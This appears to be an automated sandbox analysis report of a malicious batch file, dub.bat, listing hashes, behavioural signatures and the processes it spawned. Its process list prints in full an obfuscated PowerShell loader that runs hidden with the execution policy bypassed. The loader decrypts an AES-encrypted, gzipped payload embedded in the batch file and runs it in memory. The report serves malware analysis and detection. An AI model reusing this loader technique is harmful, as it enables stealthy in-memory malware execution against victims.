Analysis
-
max time kernel
42s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-02-2023 03:50
Static task
static1
Behavioral task
behavioral1
Sample
dub.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
dub.bat
Resource
win10-20220901-en
General
-
Target
dub.bat
-
Size
226KB
-
MD5
cf81b345541f19ab200b4d0de4a64962
-
SHA1
56dcdd340cb470fcd42c0cd1531d1eac8fcd7980
-
SHA256
07a0759d5b376fc57f2ad9c5a32d59829934828b862591225c43421044ffd4ec
-
SHA512
ac960f497fc3354831a76c1a385e95c65b66d862bd09e24b73bedb8e969d8221516e8d7a6eba257c5613c61d82d16305fd672a5112d441b97e5fefa0d88a7e97
-
SSDEEP
6144:LiEz3MvivRRFAFNmR3QaqnMadPo7lNhkLPUoV:mivRRFsNmwulNeLcoV
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
dub.bat.exepid process 1432 dub.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1660 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
dub.bat.exepid process 1432 dub.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dub.bat.exedescription pid process Token: SeDebugPrivilege 1432 dub.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1660 wrote to memory of 1432 1660 cmd.exe dub.bat.exe PID 1660 wrote to memory of 1432 1660 cmd.exe dub.bat.exe PID 1660 wrote to memory of 1432 1660 cmd.exe dub.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\dub.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\dub.bat.exe"dub.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utCHT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dub.bat').Split([Environment]::NewLine);foreach ($sWAOq in $utCHT) { if ($sWAOq.StartsWith(':: ')) { $upQKs = $sWAOq.Substring(3); break; }; };$JjLmi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($upQKs);$YkqlI = New-Object System.Security.Cryptography.AesManaged;$YkqlI.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YkqlI.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YkqlI.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kiFQHKEXvznY0Nsnm3fp94kgb604e6Feq9TQN777Yxs=');$YkqlI.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5Ca2LFqXHi3HVlKnNoz3+g==');$vFmBU = $YkqlI.CreateDecryptor();$JjLmi = $vFmBU.TransformFinalBlock($JjLmi, 0, $JjLmi.Length);$vFmBU.Dispose();$YkqlI.Dispose();$fuUUI = New-Object System.IO.MemoryStream(, $JjLmi);$gvEAD = New-Object System.IO.MemoryStream;$wMQDT = New-Object System.IO.Compression.GZipStream($fuUUI, [IO.Compression.CompressionMode]::Decompress);$wMQDT.CopyTo($gvEAD);$wMQDT.Dispose();$fuUUI.Dispose();$gvEAD.Dispose();$JjLmi = $gvEAD.ToArray();$vodVl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JjLmi);$UBeHH = $vodVl.EntryPoint;$UBeHH.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\dub.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\dub.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1432-55-0x0000000000000000-mapping.dmp
-
memory/1432-57-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmpFilesize
8KB
-
memory/1432-58-0x000007FEF42B0000-0x000007FEF4CD3000-memory.dmpFilesize
10.1MB
-
memory/1432-60-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/1432-59-0x000007FEF3750000-0x000007FEF42AD000-memory.dmpFilesize
11.4MB
-
memory/1432-61-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/1432-62-0x000000000253B000-0x000000000255A000-memory.dmpFilesize
124KB